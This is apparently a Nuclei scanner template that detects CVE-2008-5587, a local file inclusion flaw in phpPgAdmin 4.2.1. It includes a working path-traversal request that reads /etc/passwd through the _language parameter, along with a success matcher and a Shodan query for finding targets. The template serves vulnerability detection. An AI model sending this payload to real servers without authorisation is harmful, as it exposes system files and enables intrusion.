id: CVE-2008-5587 info: name: phpPgAdmin <=4.2.1 - Local File Inclusion author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. impact: | An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code. remediation: | Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/7363 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html - http://securityreason.com/securityalert/4737 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 epss-percentile: 0.88625 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" tags: cve,cve2008,lfi,phppgadmin,edb http: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950